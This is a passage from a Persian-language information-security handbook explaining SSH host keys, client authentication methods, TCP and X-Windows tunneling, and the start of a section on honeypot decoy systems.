‫)ﻛﻪ ﻛﻠﻴﺪ ﻣﻴﺰﺑﺎﻥ ‪ ٢٩٨SSH‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ( ﺭﺍ ﺩﺍﺭﺍ ﺍﺳﺖ‪ .‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎﻱ ﻧﺴﺨﺔ ﺩﻭﻡ‪ ،‬ﺟﻔﺖﻛﻠﻴﺪ ﺛﺎﻧﻮﻳﻪﺍﻱ ﻧﻴﺰ ﺩﺍﺭﻧﺪ ﻛﻪ "ﻛﻠﻴﺪ ‪DSA‬‬
‫ﻣﻴﺰﺑﺎﻥ" ﻧﺎﻡ ﺩﺍﺭﺩ ﻭ ﺍﺯ ﺍﻟﮕﻮﺭﻳﺘﻢ ﺭﻣﺰﮔﺬﺍﺭﻱ ‪ DSA‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ‪ .‬ﻏﺎﻟﺐ ﻗﻄﻌﻪﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ‪ - SSH‬ﺍﮔﺮ ﺍﻳﻦ ﻛﻠﻴﺪ ﺍﺯ ﻗﺒﻞ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﺪ ‪ -‬ﺁﻧﺮﺍ ﻫﻨﮕﺎﻡ ﺍﻭﻟﻴﻦ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﺼﻮﺭﺕ ﺧﻮﺩﻛﺎﺭ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﻨﺪ‪.‬‬
‫ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ‪ SSH‬ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺧﻮﺩ ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ‪ .‬ﺍﻳﻦ ﻛﻠﻴﺪ ﺩﻭ‬
‫ﻛﺎﺭﺑﺮﺩ ﺩﺍﺭﺩ‪ .‬ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺍﺯ ﺍﻳﻦ ﻛﻠﻴﺪ ﺑﺮﺍﻱ ﺭﻣﺰﮔﺬﺍﺭﻱ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺩﺭ ﻃﻮﻝ ﻋﻤﻠﻴﺎﺕ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‬
‫ﻣﻲﻓﺮﺳﺘﺪ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﺪ؛ ﻭ ﺩﻭﻡ ﺍﻳﻨﻜﻪ ﺑﺮﺍﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺑﻌﻨﻮﺍﻥ ﻣﻌﺮﻑ ﻫﻮﻳﺖ ﺁﻥ ﺍﺳﺖ‪ .‬ﻫﺮ ﺑﺎﺭ ﻛﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ‪ ،‬ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻳﻜﺴﺎﻧﻲ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﻣﺸﺘﺮﻱ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻫﺮ ﺑﺎﺭ ﺍﺗﺼﺎﻝ ﺑﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺗﺸﺨﻴﺺ ﺩﻫﺪ ﻛﻪ ﺑﺎ ﻫﻤﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻗﺒﻠﻲ ﺩﺭ ﺗﻤﺎﺱ ﺍﺳﺖ‪.‬‬
‫ﻛﻠﻴﺪ ﻣﻴﺰﺑﺎﻥ ﺩﺭ ﺑﺮﺍﺑﺮ ﺩﻭ ﻧﻮﻉ ﺣﻤﻠﻪ ﺍﻳﺠﺎﺩ ﻣﺤﺎﻓﻈﺖ ﻣﻲﻛﻨﺪ‪ .‬ﺍﻭﻝ ﺍﻳﻨﻜﻪ ﺑﻪ ﺷﻤﺎ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺎ ﻣﻴﺰﺑﺎﻥ ﺻﺤﻴﺢ ﺩﺭ ﺍﺭﺗﺒﺎﻁ ﻫﺴﺘﻴﺪ‪.‬‬
‫ﺍﮔﺮ ﻣﻴﺰﺑﺎﻧﻲ ﻛﻪ ﻗﺼﺪ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺁﻧﺮﺍ ﺩﺍﺭﻳﺪ ﺁﺩﺭﺱ ‪ IP‬ﺧﻮﺩ ﺭﺍ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩ ﺑﺎﺷﺪ ﻭ ﻳﺎ ﻧﺎﻡ ‪ DNS‬ﺟﺪﻳﺪﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ )ﻭ ﻳﺎ ﺍﮔﺮ ﺷﺨﺼﻲ ﺑﻪ‬
‫ﺳﻴﺴﺘﻢ ‪ DNS‬ﺷﻤﺎ ﺣﻤﻠﻪ ﻛﺮﺩﻩ ﻭ ﺍﻳﻦ ﺳﻴﺴﺘﻢ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﻧﺎﺻﺤﻴﺢ ﺭﺍ ﺗﻮﺯﻳﻊ ﻛﻨﺪ(‪ ،‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ‪ SSH‬ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﺩ ﻛﻪ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﻳﻚ‬
‫ﻛﻠﻴﺪ ﻣﻴﺰﺑﺎﻥ ﻣﺘﻔﺎﻭﺕ ﺍﺯ ﺁﺩﺭﺱ ﻗﺪﻳﻤﻲ ﺩﺍﺭﺩ ﻭ ﺩﺭ ﺁﻧﺼﻮﺭﺕ ﺷﻤﺎ ﻣﺘﻮﺟﻪ ﻣﻲﺷﻮﻳﺪ ﻛﻪ ﻧﺒﺎﻳﺪ ﺭﻣﺰ ﻋﺒﻮﺭ ﺧﻮﺩ ﺭﺍ ﻭﺍﺭﺩ ﻛﻨﻴﺪ‪ .‬ﺩﻭﻡ ﺍﻳﻨﻜﻪ ﺑﺎ ﻛﻠﻴﺪ‬
‫ﻣﻴﺰﺑﺎﻥ ﺍﻃﻤﻴﻨﺎﻥ ﻣﻲﻳﺎﺑﻴﺪ ﻛﻪ ﻳﻚ ﺍﺭﺗﺒﺎﻁ ﺭﻣﺰﺷﺪﻩ ﻭ ﻣﺴﺘﻘﻴﻢ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺧﻮﺍﻫﻴﺪ ﺩﺍﺷﺖ ﻭ ﻫﻴﭻ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﻃﻮﻝ ﻣﺴﻴﺮ‬

‫‪297 Tatu Ylonen‬‬


‫‪298 SSH HostKey‬‬
‫‪٤٠٧‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬

‫ﻗﺎﺩﺭ ﺑﻪ ﺍﻧﺠﺎﻡ ﺣﻤﻠﺔ "ﺷﺨﺺ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ" ﻧﻴﺴﺖ‪ .‬ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻳﻚ ﺣﻤﻠﺔ ﻣﻮﻓﻖ ﺍﺯ ﺍﻳﻦ ﻧﻮﻉ‪ ،‬ﻣﻬﺎﺟﻢ ﻧﺎﭼﺎﺭ ﺑﻪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ‬
‫ﺧﻮﺩ ﺍﺳﺖ ‪ -‬ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﻛﻪ ﻛﻠﻴﺪ ﺧﺼﻮﺻﻲ ﻣﺘﻨﺎﻇﺮ ﺁﻧﺮﺍ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ‪.‬‬
‫ﻣﺘﺄﺳﻔﺎﻧﻪ ﺑﻨﻈﺮ ﻣﻲﺭﺳﺪ ﻛﻪ ﻛﻠﻴﺪﻫﺎﻱ ﻣﻴﺰﺑﺎﻥ ﻃﺒﻖ ﻗﺎﻋﺪﺓ ﻣﻨﻈﻤﻲ ﺗﻐﻴﻴﺮ ﻣﻲﻛﻨﻨﺪ ‪ -‬ﮔﺎﻫﻲ ﻫﻨﮕﺎﻣﻴﻜﻪ ﻛﻪ ﻳﻚ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺟﺪﻳﺪ ﻧﺼﺐ‬
‫ﻣﻲﺷﻮﺩ‪ ،‬ﻳﺎ ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﻧﺼﺐ ﺟﺪﻳﺪ ﺍﺯ ‪ SSH‬ﺑﻪ ﺍﺷﺘﺒﺎﻩ ﺑﺠﺎﻱ ﺣﻔﻆ ﻛﻠﻴﺪ ﻗﺒﻠﻲ ﻭ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﻳﻚ ﻛﻠﻴﺪ ﻣﻴﺰﺑﺎﻥ ﺟﺪﻳﺪ ﺗﻮﻟﻴﺪ‬
‫ﻣﻲﻧﻤﺎﻳﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ ﻫﺮﮔﺎﻩ ﻛﻠﻴﺪ ﻣﻴﺰﺑﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻃﺮﻑ ﺍﺭﺗﺒﺎﻁ ﺗﻐﻴﻴﺮ ﻛﻨﺪ‪ ،‬ﻧﺒﺎﻳﺪ ﺑﻼﻓﺎﺻﻠﻪ ﻧﺘﻴﺠﻪ ﮔﺮﻓﺖ ﻛﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻣﻮﺭﺩ‬
‫ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﻭ ﻳﺎ ﻳﻚ ﺣﻤﻠﺔ "ﺷﺨﺺ ﺩﺭ ﻣﻴﺎﻥ ﺭﺍﻩ" ﺩﺭﺣﺎﻝ ﻭﻗﻮﻉ ﺍﺳﺖ؛ ﺑﻠﻜﻪ ﺑﺎﻳﺪ ﺩﻳﺪ ﻛﻪ ﺩﻟﻴﻞ ﺗﻐﻴﻴﺮ ﻛﻠﻴﺪ ﭼﻪ ﺑﻮﺩﻩ ﺍﺳﺖ‪.‬‬

‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪SSH‬‬

‫ﺯﻣﺎﻧﻴﻜﻪ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SSH‬ﻣﺘﺼﻞ ﻣﻲﺷﻮﺩ‪ ،‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﺣﺴﺎﺑﻲ ﻛﻪ ﻗﺼﺪ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻥ ﺩﺍﺭﺩ‬
‫ﺭﺍ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ‪ ،‬ﻭ ﺳﭙﺲ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﺍﻳﻦ ﺍﺩﻋﺎ ﻳﻚ ﺳﻨﺪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺍﺭﺍﺋﻪ ﻣﻲﻛﻨﺪ‪ .‬ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﺁﻥ ﺳﻨﺪ ﺭﺍ ﻣﻌﺘﺒﺮ‬
‫ﺗﺸﺨﻴﺺ ﺩﻫﺪ‪ ،‬ﻳﻚ ﻧﺴﺨﻪ ﺍﺯ ﭘﻮﺳﺘﻪ ﺑﺮﺍﻱ ﺁﻥ ﻛﺎﺭﺑﺮ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻭ ﻛﺎﺭﺑﺮ ﺭﺍ ﻭﺍﺭﺩ ﺁﻥ ﻣﻲﺳﺎﺯﺩ‪.‬‬
‫‪٢٩٩‬‬
‫‪ SSH‬ﺑﺮﺍﻱ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﺭﻭﻱ ﺳﻴﺴﺘﻢﻋﺎﻣﻞ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‪ ،‬ﺭﻭﺷﻬﺎﻱ ﺍﻣﻨﻴﺘﻲ ﻣﺨﺘﻠﻔﻲ ﺩﺍﺭﺩ‪:‬‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻳﻚ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﻌﺘﺒﺮ ﺑﺮﺍﻱ ﺣﺴﺎﺏ ﻛﺎﺭﺑﺮﻱ ﻣﻮﺟﻮﺩ ﺭﻭﻱ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺍﺭﺍﺋﻪ ﻛﻨﻨﺪ‪ .‬ﺍﻳﻦ ﺭﻣﺰ‬ ‫•‬
‫ﻋﺒﻮﺭ ﺑﺼﻮﺭﺕ ﻣﺘﻦﺳﺎﺩﻩ ﻣﻨﺘﻘﻞ ﻧﻤﻲﺷﻮﺩ‪.‬‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺮﺍﻱ ﺍﺛﺒﺎﺕ ﻫﻮﻳﺖ ﺧﻮﺩ ﺍﺯ ﺭﻣﺰﻧﮕﺎﺭﻱ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺑﺎﻳﺪ‬ ‫•‬
‫ﻳﻚ ﻛﻠﻴﺪ ﻋﻤﻮﻣﻲ ﺍﺭﺍﺋﻪ ﺩﻫﺪ ﻛﻪ ﺩﺭ ﻓﺎﻳﻞ ﻛﻠﻴﺪﻫﺎﻱ ﻣﺠﺎﺯ ﻣﺸﺘﺮﻱ ﻭﺟﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﻣﺸﺘﺮﻱ ﺑﺘﻮﺍﻧﺪ ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺑﺎ ﺍﻳﻦ ﻛﻠﻴﺪ‬
‫ﺭﻣﺰﮔﺬﺍﺭﻱ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺭﻣﺰﮔﺸﺎﻳﻲ ﻛﻨﺪ‪.‬‬
‫ﺦ ﻣﻮﺟﻮﺩ‬‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ‪ ،Kerberos‬ﺭﻣﺰ ﻋﺒﻮﺭ ﻳﻜﺒﺎﺭ ﻣﺼﺮﻑ‪ ،‬ﻭ ﻳﺎ ﺳﺎﻳﺮ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺩﺭﺧﻮﺍﺳﺖ ‪ /‬ﭘﺎﺳ ﹺ‬ ‫•‬
‫ﺩﺭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ‪ ،‬ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺷﻮﻧﺪ‪.‬‬

‫ﺗﻮﻧﻞ ﺯﺩﻥ ﺍﺗﺼﺎﻝ ‪TCP‬‬

‫‪ SSH‬ﻗﺎﺩﺭ ﺍﺳﺖ ﻳﻚ ﺍﺗﺼﺎﻝ ‪ TCP‬ﺭﺍ ﺑﺼﻮﺭﺕ ﺗﻮﻧﻞ ﻣﻴﺎﻥ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩ ﻭ ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺛﺎﻧﻮﻳﻪ ﺑﺮﻗﺮﺍﺭ ﻛﻨﺪ‪ .‬ﺍﺑﺘﺪﺍ ﺍﺯ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ‪ SSH‬ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﺗﺎ ﺍﺗﺼﺎﻟﻲ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SSH‬ﺭﻭﻱ ﻣﺎﺷﻴﻦ ﺭﺍﻩ ﺩﻭﺭ ﺑﺮﻗﺮﺍﺭ ﺷﻮﺩ ﻭ ﺩﺭﺧﻮﺍﺳﺖ ﺍﻳﺠﺎﺩ ﺗﻮﻧﻞ ﺑﻪ‬
‫ﻝ ﺁﻥ ﺑﺮﻗﺮﺍﺭ ﮔﺮﺩﺩ‪،‬‬‫ﻳﻚ ﭘﻮﺭﺕ ﺩﻳﮕﺮ ﺁﻥ ﻣﺎﺷﻴﻦ ﺍﺭﺳﺎﻝ ﮔﺮﺩﺩ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ‪ SSH‬ﻣﻮﻓﻘﻴﺖﺁﻣﻴﺰ ﺑﺎﺷﺪ ﻭ ﺍﺗﺼﺎ ﹺ‬
‫ﺍﻳﻦ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﺭﻭﻱ ﻳﻚ ﭘﻮﺭﺕ ﺟﺪﻳﺪ ﺭﺍﻳﺎﻧﺔ ﻣﻴﺰﺑﺎﻥ ﺧﻮﺩ ﺑﻪ ﺍﻧﺘﻈﺎﺭ ﻣﻲﺍﻳﺴﺘﺪ؛ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ SSH‬ﺍﺗﺼﺎﻟﻲ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﺩﻭﻣﻲ ﻛﻪ ﺭﻭﻱ ﻣﺎﺷﻴﻦ ﺭﺍﻩ ﺩﻭﺭ ﺍﺳﺖ ﺑﺮﻗﺮﺍﺭ ﻣﻲﺳﺎﺯﺩ؛ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺩﻭﻡ ﺑﻪ ﺑﺮﻗﺮﺍﺭﻱ ﺍﺗﺼﺎﻝ ﺑﺎ ﭘﻮﺭﺕ ﺟﺪﻳﺪ ﻣﻴﺰﺑﺎﻥ ﻣﺤﻠﻲ ﻫﺪﺍﻳﺖ‬
‫ﻣﻲﺷﻮﺩ ﻭ ﺩﺍﺩﻩﻫﺎﻱ ﺩﺭﻳﺎﻓﺘﻲ ﺍﺯ ﺍﻳﻦ ﭘﻮﺭﺕ ﺟﺪﻳﺪ ﺗﻮﺳﻂ ‪ SSH‬ﺑﻪ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ sshd‬ﺍﻧﺘﻘﺎﻝ ﻣﻲﻳﺎﺑﺪ‪ ،‬ﻭ ﺁﻥ ﻧﻴﺰ ﺩﺍﺩﻩﻫﺎ ﺭﺍ ﺑﻪ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺩﻭﻡ ﻣﻲﻓﺮﺳﺘﺪ‪.‬‬
‫ﻼ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ‪ FTP‬ﺑﺎﻳﺪ ﺍﺯ ﭼﻨﺪﻳﻦ ﺗﻮﻧﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‬ ‫ﺑﺮﺧﻲ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎ ﺭﺍ ﻧﻤﻲﺗﻮﺍﻥ ﺑﺎ ﻳﻚ ﺗﻮﻧﻞ ﺳﺎﺩﺓ ‪ TCP‬ﻣﺤﺎﻓﻈﺖ ﻛﺮﺩ‪ .‬ﻣﺜ ﹰ‬
‫‪٣٠٠‬‬
‫)ﻛﻪ ﭘﻴﺶﺑﻴﻨﻲ ﺑﺮﺧﻲ ﺍﺯ ﺁﻧﻬﺎ ﻣﺸﻜﻞ ﺍﺳﺖ( ﻭ ﺑﻨﺎﺑﺮﺍﻳﻦ ﺑﻴﺸﺘﺮ ﻧﺴﺨﻪﻫﺎﻱ ‪ ،SSH‬ﻳﻚ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ‪ FTP‬ﺟﺎﻳﮕﺰﻳﻦ ﺩﺍﺭﻧﺪ ﻛﻪ ﻣﻄﺎﺑﻖ‬
‫ﺍﻧﺘﻈﺎﺭﻱ ﻛﻪ ﻛﺎﺭﺑﺮﺍﻥ ﺍﺯ ‪ FTP‬ﺩﺍﺭﻧﺪ ﻛﺎﺭ ﻣﻲﻛﻨﺪ‪ ،‬ﺍﻣﺎ ﺍﺗﺼﺎﻻﺕ ‪ SSH‬ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﺑﺮﺩ‪ .‬ﭘﺮﻭﺗﻜﻞ ‪ X-Windows‬ﻧﻴﺰ ﺍﺯ ﻣﺸﻜﻼﺕ ﻣﺸﺎﺑﻬﻲ‬
‫ﺭﻧﺞ ﻣﻲﺑﺮﺩ‪ ،‬ﺍﻣﺎ ﺩﺭ ﺑﻴﺸﺘﺮ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ‪ ،SSH‬ﺑﺮﺍﻱ ﺗﻮﻧﻞ ﺯﺩﻥ ﺍﺗﺼﺎﻝ ‪ X-Windows‬ﭘﺸﺘﻴﺒﺎﻧﻲ ﺧﺎﺹ ﻭﺟﻮﺩ ﺩﺍﺭﺩ‪ .‬ﺑﺠﺎﻱ ﺍﺟﺮﺍﻱ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ‪ X‬ﺭﻭﻱ ﻳﻚ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﺤﻠﻲ ‪ SSH ،X‬ﻳﻚ ﻧﻤﺎﻳﺸﮕﺮ ﻣﺠﺎﺯﻱ ‪ X‬ﻭ ﻳﻚ ﺗﻮﻧﻞ ﺍﻳﺠﺎﺩ ﻣﻲﻛﻨﺪ ﻛﻪ‬
‫ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﺓ ﺭﺍﻩ ﺩﻭﺭ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﺍﺭﺗﺒﺎﻁ ﺑﺎ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ﻣﺤﻠﻲ )ﺍﺯ ﻃﺮﻳﻖ ‪ (SSH‬ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﺪ‪.‬‬

‫‪ SSH ۲۹۹‬ﺭﻭﺷﻬﺎﻱ ﺑﺎ ﺍﻣﻨﻴﺖ ﻛﻤﺘﺮ ﻧﻴﺰ ﺩﺍﺭﺩ ﻛﻪ ﺑﺮ ﺍﺳﺎﺱ ﺁﺩﺭﺱ ‪ IP‬ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ ﻭ ﻋﻤﻮﻣﹰﺎ ﺑﺎﻳﺪ ﺍﺯ ﺑﻜﺎﺭ ﺑﺮﺩﻥ ﺁﻧﻬﺎ ﺍﺟﺘﻨﺎﺏ ﻛﺮﺩ‪.‬‬
‫‪ ۳۰۰‬ﺍﻳﻦ ﺳﺮﻭﻳﺲﮔﻴﺮﻧﺪﻩ ﻣﻌﻤﻮ ﹰﻻ ‪ sftp‬ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﺩ‪.‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٤٠٨‬‬

‫ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ‬
‫ﻳﻚ ﺭﻭﺵ ﺟﺪﻳﺪ ﺑﺮﺍﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﻣﻬﺎﺟﻤﺎﻥ‪ ،‬ﺑﺮﭘﺎﻳﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﺑﺮﺍﻱ ﺁﻧﺎﻥ ﺍﺳﺖ ﺗﺎ ﺑﺠﺎﻱ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺍﺻﻠﻲ ﺑﻪ ﺁﻧﻬﺎ ﺣﻤﻠﻪ ﻛﻨﻨﺪ‪ ،‬ﻭ‬
‫ﻻ ﺑﻪ ﺷﺪﺕ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ .‬ﺩﺭ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎ ﺗﻌﻤﺪﹰﺍ ﺁﺳﻴﺐﭘﺬﻳﺮﻳﻬﺎﻱ ﺷﻨﺎﺧﺘﻪﺷﺪﻩ ﺭﺍ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻨﺪ ﺗﺎ‬
‫ﻟﺬﺍ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﺍﺣﺘﻤﺎﻝ ﻣﻮﺭﺩ ﺣﻤﻠﻪ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺁﻧﻬﺎ ﺑﺎﻻ ﺭﻭﺩ‪ .‬ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﻛﻪ ﮔﺎﻫﻲ "ﻛﻮﺯﺓ ﻋﺴﻞ" ﻧﻴﺰ ﻧﺎﻣﻴﺪﻩ ﻣﻲﺷﻮﻧﺪ ﺩﻭ ﻣﺰﻳﺖ ﺍﺻﻠﻲ ﺩﺍﺭﻧﺪ‪:‬‬
‫ﺍﺯ ﺁﻧﺠﺎ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻃﻌﻤﻪ ﺑﻪ ﺷﺪﺕ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ‪ ،‬ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﺷﻨﺎﺳﺎﻳﻲ ﻣﻬﺎﺟﻤﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻛﺮﺩ‪ .‬ﺑﺎ ﺍﻳﻦ‬ ‫‪.١‬‬
‫ﺳﻴﺴﺘﻤﻬﺎ ﻣﻲﺗﻮﺍﻥ ﻣﻮﻗﻌﻴﺖ‪ ،‬ﺗﻜﻨﻴﻚ‪ ،‬ﺍﻧﮕﻴﺰﻩ‪ ،‬ﺳﻄﺢ ﻣﻬﺎﺭﺕ‪ ،‬ﺍﻫﺪﺍﻑ‪ ،‬ﻭ ﺳﺎﻳﺮ ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑﻮﻁ ﺑﻪ ﻣﻬﺎﺟﻤﺎﻥ ﺭﺍ ﺑﺪﺳﺖ ﺁﻭﺭﺩ‪.‬‬
